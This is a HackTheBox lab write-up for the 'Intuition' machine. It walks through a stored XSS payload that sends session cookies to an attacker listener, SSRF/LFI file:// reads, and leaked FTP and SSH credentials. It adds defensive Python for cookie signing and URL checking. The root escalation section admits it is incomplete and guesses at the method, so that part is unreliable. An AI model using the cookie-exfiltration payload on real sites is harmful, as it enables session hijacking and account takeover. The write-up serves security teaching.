HTB: Intuition Writeup


Machine Information

Attribute    | Details
Name         | Intuition
OS           | Linux
Difficulty   | Hard
Points       | N/A
Release Date | N/A
IP Address   | 10.129.18.45 / 10.129.21.93
Domain       | comprezzor.htb
Author       | D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐⭐☆

Summary

Intuition is a Hard-difficulty Linux machine. The chain starts with a stored XSS in the bug-report form on report.comprezzor.htb, used to harvest session cookies; the webdev cookie grants dashboard access, an SSRF/LFI in the Flask application exposes the source code and hardcoded FTP credentials, and the FTP server holds an SSH private key plus its passphrase for user access. Privilege escalation to root involves Ansible role artifacts and is not fully documented in the notes.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.21.93

Results:

No port data available in notes.

Service Enumeration

Primary Domain: comprezzor.htb

Subdomains Discovered:

  • dashboard.comprezzor.htb — Report management dashboard
  • auth.comprezzor.htb — Authentication service
  • report.comprezzor.htb — Bug report submission interface

Host Configuration:

echo "10.129.18.45 comprezzor.htb dashboard.comprezzor.htb auth.comprezzor.htb report.comprezzor.htb" >> /etc/hosts

Technology Stack:

  • Flask web application
  • Flask secret key: 7ASS7ADA8RF3FD7
  • Allowed file uploads: .txt, .pdf, .docx (max 5MB)

Initial Foothold

Stored XSS on report.comprezzor.htb

The report.comprezzor.htb subdomain hosts a bug report submission form that is vulnerable to Stored Cross-Site Scripting (XSS). This vulnerability allows attackers to inject malicious JavaScript that executes in the context of admin/user sessions.

Attack Vector:

Submitted XSS payloads via the bug report form to steal authentication cookies:

<img src=x onerror=this.src='http://10.10.14.44:8001/'+document.cookie>

This payload triggers when the report is viewed by authenticated users, exfiltrating their cookies to an attacker-controlled server on 10.10.14.44:8001.

Cookies Harvested:

  1. Admin Cookie:

    {"user_id": 1, "username": "admin", "role": "admin"}|34822333d444ae0e4022f6cc679ac9d26d1d1d682c59c61cfbea29d776d589d9
  2. Webdev (Adam) Cookie:

    {"user_id": 2, "username": "adam", "role": "webdev"}|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8
  3. Custom User (mrsudo) Cookie:

    {"user_id": 6, "username": "mrsudo", "role": "user"}
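The harvested cookies have the shape <json>|<hex tag>. As an added example (not the target's code, which the page does not show), here is how a server should mint and verify such a cookie with an HMAC-SHA256 over the JSON body and a constant-time comparison, so that a forged role or a tag-less cookie like the mrsudo one is rejected, together with the Set-Cookie flags that would have blunted the document.cookie exfiltration. The secret value and the HMAC scheme are assumptions.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed secret for this example only; never reuse a value like this.
SECRET = b"example-only-secret-change-me"

def sign_cookie(payload: dict, secret: bytes = SECRET) -> str:
    """Mint '<json>|<hex tag>', the same shape as the harvested cookies.
    The tag is HMAC-SHA256 over the exact JSON bytes (assumed scheme), so any
    edit to user_id, username or role invalidates it."""
    body = json.dumps(payload)  # default separators produce '{"k": v, ...}'
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{tag}"

def verify_cookie(cookie: str, secret: bytes = SECRET) -> Optional[dict]:
    """Return the payload if the tag checks out, else None.
    Rejects a missing tag (like the mrsudo cookie above), a malformed tag,
    or a mismatch; compare_digest avoids leaking the tag through timing."""
    body, sep, tag = cookie.rpartition("|")
    if not sep or len(tag) != 64:
        return None
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    try:
        payload = json.loads(body)
    except ValueError:
        return None
    return payload if isinstance(payload, dict) else None

def session_set_cookie(value: str) -> str:
    """Set-Cookie line with the flags that keep the cookie out of
    document.cookie (HttpOnly), off plaintext HTTP (Secure) and away from
    cross-site requests (SameSite). Real code should base64-encode the value,
    because quotes and spaces are not valid cookie octets."""
    return f"Set-Cookie: session={value}; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    good = sign_cookie({"user_id": 2, "username": "adam", "role": "webdev"})
    forged = good.replace('"role": "webdev"', '"role": "admin"')
    print("intact:", verify_cookie(good))
    print("forged role:", verify_cookie(forged))
    print(session_set_cookie(good))
```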

Dashboard Access

Using adam’s (webdev) cookie, authenticated access was gained to dashboard.comprezzor.htb. The dashboard provides report management functionality:

  • View bug reports
  • Change report priority
  • Delete reports
  • Resolve reports

User Compromise

Source Code Extraction via SSRF/LFI

Leveraging the SSRF/LFI in the Flask application (the server-side fetcher accepts file:// URLs), the application source code was extracted, revealing sensitive information:

Flask Application Structure:

file:///app/code/app.py — Application entry point with blueprints configuration
file:///app/code/blueprints/dashboard/dashboard.py — Dashboard blueprint containing FTP credentials

FTP Credential Discovery

Within /app/code/blueprints/dashboard/dashboard.py, hardcoded FTP credentials were found:

Username: ftp_admin
Password: u3jai8y71s2
Host: ftp.local

FTP Connection via SSRF

FTP access was established using the discovered credentials:

ftp://ftp_admin:u3jai8y71s2@ftp.local
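The file:// source reads and the ftp:// fetch above both work because the server-side fetcher accepts any URL. As an added example (not the application's code, which the page does not show), this checker rejects non-HTTP schemes, embedded credentials, and hosts that resolve to private or loopback ranges before anything is fetched; the allowed schemes, the constructed resolver table and the sample addresses are assumptions.

```python
import ipaddress
import socket
from typing import Callable, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def is_public_ip(ip: str) -> bool:
    """True only for globally routable unicast addresses: rejects RFC 1918,
    loopback, link-local, reserved, multicast and unspecified ranges."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified)

def check_fetch_url(url: str,
                    resolve: Callable[[str], str] = socket.gethostbyname) -> Optional[str]:
    """Return None if the URL is safe to fetch, otherwise the rejection reason.
    The resolver is injectable so the check runs offline; the caller must connect
    to the IP returned here rather than re-resolve, or DNS rebinding can bypass it."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return f"scheme not allowed: {parts.scheme or '(none)'}"
    if parts.username is not None or parts.password is not None:
        return "userinfo in URL not allowed"
    host = (parts.hostname or "").lower()
    if not host:
        return "missing host"
    try:
        ip = resolve(host)
    except OSError:
        return f"unresolvable host: {host}"
    if not is_public_ip(ip):
        return f"{host} resolves to non-public address {ip}"
    return None

# Constructed resolver table so the example runs without network access.
FAKE_DNS = {"example.com": "93.184.216.34", "ftp.local": "10.0.0.5",
            "localhost": "127.0.0.1", "comprezzor.htb": "10.129.18.45"}

def fake_resolve(host: str) -> str:
    if host not in FAKE_DNS:
        raise OSError(f"no such host: {host}")
    return FAKE_DNS[host]

if __name__ == "__main__":
    for u in ["file:///app/code/app.py", "ftp://user:secret@ftp.local",
              "http://localhost:8080/", "https://example.com/status"]:
        print(u, "->", check_fetch_url(u, fake_resolve) or "allowed")
```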

Files Retrieved from FTP Server:

  • welcome_note.pdf
  • private-8297.key — SSH private key
  • welcome_note.txt — Contains SSH key passphrase

SSH Access

From welcome_note.txt:

SSH key passphrase: Y27SH19HDIWD
SSH private key file: private-8297.key

SSH Connection:

ssh -i private-8297.key adam@comprezzor.htb
# Enter passphrase: Y27SH19HDIWD

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

System Discovery

During enumeration of the compromised system, artifacts related to Ansible role management were discovered:

  • Ansible role configuration files
  • sys-admins-role tar archives

⚠️ NOTE: The complete privilege escalation technique utilizing Ansible roles is not fully documented in the available source notes. Further investigation of the Ansible artifacts and their misconfiguration is required to complete this section.

Exploitation (Root/Administrator)

This section requires additional documentation from engagement notes. The privilege escalation likely involves:

  • Analysis of Ansible playbooks and role definitions
  • Exploitation of misconfigurations in the sys-admins-role deployment
  • Potential privilege escalation through Ansible task execution or role inheritance

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Reconnaissance: comprezzor.htb + subdomains"] --> B["XSS on report.comprezzor.htb"]
B --> C["Steal admin + webdev cookies"]
C --> D["Dashboard access as adam webdev"]
D --> E["SSRF/LFI: Read Flask source code"]
E --> F["FTP credentials discovered: ftp_admin:u3jai8y71s2"]
F --> G["SSH key + passphrase Y27SH19HDIWD"]
G --> H["SSH access → User flag"]
H --> I["Privilege escalation via Ansible role artifacts"]

Tools Used

Tool                | Purpose
Browser / BurpSuite | XSS payload injection and cookie harvesting
HTTP Server         | Cookie exfiltration listener (10.10.14.44:8001)
cURL / Browser      | SSRF/LFI exploitation for source code extraction
FTP Client          | FTP server access with harvested credentials
OpenSSH             | SSH authentication with private key and passphrase
grep / find         | System enumeration and artifact discovery

Key Learnings

  • XSS in User-Facing Forms: Even seemingly innocuous bug report forms can be exploited to harvest authentication tokens from administrators and privileged users.
  • Cookie-Based Authentication: Session cookies often carry everything needed for role-based access control, so keeping them out of reach of injected scripts matters; the HttpOnly and Secure flags are critical.
  • Source Code Disclosure: SSRF and LFI vulnerabilities in web applications can lead to extraction of sensitive configuration data, including hardcoded credentials.
  • Credential Reuse: Once credentials are harvested (FTP, SSH keys), they often grant access to multiple systems, enabling lateral movement throughout the infrastructure.
  • Ansible Infrastructure Risk: Misconfigured Ansible roles and playbooks can become a privilege escalation vector if improperly secured.
  • Defense in Depth: Multiple layers of defense (input validation, content security policies, least privilege access, credential management) are essential.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Hard